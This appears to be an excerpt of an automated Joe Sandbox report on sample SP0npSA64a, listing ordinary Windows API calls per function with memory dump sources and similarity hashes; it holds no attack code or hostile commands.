                                                                                  • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                  • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                  • _wcslen.LIBCMT ref: 0047A79E
                                                                                  • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                  • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 3257027151-0
                                                                                  • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                  • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                  • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                  • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                  APIs
                                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastselect
                                                                                  • String ID:
                                                                                  • API String ID: 215497628-0
                                                                                  • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                  • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                  • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                  • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 0044443B
                                                                                  • GetKeyboardState.USER32(?), ref: 00444450
                                                                                  • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                  • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                  • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                  • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 00444633
                                                                                  • GetKeyboardState.USER32(?), ref: 00444648
                                                                                  • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                  • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                  • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                  • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                  • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                  • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                  • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                  • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                  • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                  • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2354583917-0
                                                                                  • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                  • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                  • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                  • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                  • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                  • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                  • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                  APIs
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Enable$Show$MessageMoveSend
                                                                                  • String ID:
                                                                                  • API String ID: 896007046-0
                                                                                  • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                  • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                  • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                  • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                  • GetFocus.USER32 ref: 00448ACF
                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Enable$Show$FocusMessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3429747543-0
                                                                                  • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                  • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                  • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                  • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                  • __swprintf.LIBCMT ref: 0045D4E9
                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                  • String ID: %lu$\VH
                                                                                  • API String ID: 3164766367-2432546070
                                                                                  • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                  • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                  • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                  • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: Msctls_Progress32
                                                                                  • API String ID: 3850602802-3636473452
                                                                                  • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                  • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                  • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                  • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0041F707
                                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                  • _free.LIBCMT ref: 0041F71A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                  • String ID: [B
                                                                                  • API String ID: 1020059152-632041663
                                                                                  • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                  • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                  • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                  • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                  • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                  • __getptd.LIBCMT ref: 00413DBD
                                                                                  • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                  • _free.LIBCMT ref: 00413E07
                                                                                  • __dosmaperr.LIBCMT ref: 00413E12
                                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                  • String ID:
                                                                                  • API String ID: 155776804-0
                                                                                  • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                  • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                  • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                  • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                  APIs
                                                                                    • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                    • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 1957940570-0
                                                                                  • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                  • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                  • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                  • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                  • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                  • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                  • ExitThread.KERNEL32 ref: 00413D4E
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                  • __freefls@4.LIBCMT ref: 00413D74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
